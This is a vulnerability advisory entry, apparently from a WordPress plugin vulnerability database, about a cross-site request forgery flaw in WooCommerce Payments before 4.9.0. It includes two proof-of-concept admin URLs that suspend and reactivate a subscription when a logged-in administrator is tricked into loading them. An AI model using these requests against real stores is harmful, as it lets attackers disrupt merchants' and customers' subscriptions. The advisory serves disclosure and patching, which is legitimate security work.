WooCommerce Payments < 4.9.0 – Subscription Suspension/Activation via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when suspending and activating subscriptions, which could allow attackers to make a logged in admin suspend or activate arbitrary subscription via a CSRF attack

Proof of Concept

Deactivate subscription with ID 53:
https://example.com/wp-admin/edit.php?s=&post_status=all&post_type=shop_subscription&_wpnonce=&_wp_http_referer=&action=on-hold&m=0&_wcs_product=&_payment_method=&_customer_user=&paged=1&post%5B%5D=53&action2=on-hold


Activate subscription with ID 53:
https://example.com/wp-admin/edit.php?post_type=shop_subscription&marked_on-hold=1&changed=1&ids=53&post=53&_wpnonce=&action=active

Affects Plugins

woocommerce-payments

Fixed in 4.9.0

References

URL

https://hackerone.com/reports/1708140

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

foobar7

Verified

Yes

WPVDB ID

7e4c0059-f8a7-4421-b906-1a6a801aef2a

Timeline

Publicly Published

2023-09-11 (about 2 years ago)

Added

2023-09-11 (about 2 years ago)

Last Updated

2023-09-11 (about 2 years ago)

Other

Published

Title

Published

2025-01-16

Title

WP Options Editor <= 1.1 - Cross-Site Request Forgery to Privilege Escalation

Published

2022-08-02

Title

uContext for Amazon <= 3.9.1 - Stored Cross-Site Scripting via CSRF

Published

2024-06-28

Title

Uncanny Toolkit Pro for LearnDash < 4.1.4.1 - Cross-Site Request Forgery

Published

2025-02-23

Title

Tribulant Gallery Voting < 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-11-13

Title

Exclusive Content Password Protect <= 1.1.0 - Cross-Site Request Forgery to Arbitrary File Upload